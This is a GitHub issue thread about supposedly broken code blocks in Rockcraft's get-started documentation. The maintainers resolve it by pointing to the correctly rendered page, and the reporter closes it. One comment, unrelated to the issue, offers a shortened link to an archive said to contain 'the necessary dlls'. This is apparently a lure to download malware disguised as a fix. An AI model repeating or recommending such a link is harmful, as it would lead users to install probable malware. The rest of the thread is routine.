### ISSUE TITLE
Broken code blocks in get-started guide

### ISSUE THREAD

**Issue by baycarbone** [canonical/rockcraft#710]
### Request type

Fix

### What needs to get done

![image](https://github.com/user-attachments/assets/405cd80a-8dd7-4c60-9231-165c95a28ef3)

### Documentation location

https://github.com/canonical/rockcraft/blob/main/docs/how-to/get-started.rst

**Comment by aroopcodder** [comment]
try this
https://bit.ly/3TyLBMS
I put the necessary dlls in the archive

**Comment by lengau** [comment]
The rendered version looks correct to me: https://documentation.ubuntu.com/rockcraft/en/stable/how-to/get-started/#requirements

**Comment by baycarbone** [comment]
My bad, I thought it would get rendered on GitHub directly. Closing this, sorry for the trouble.
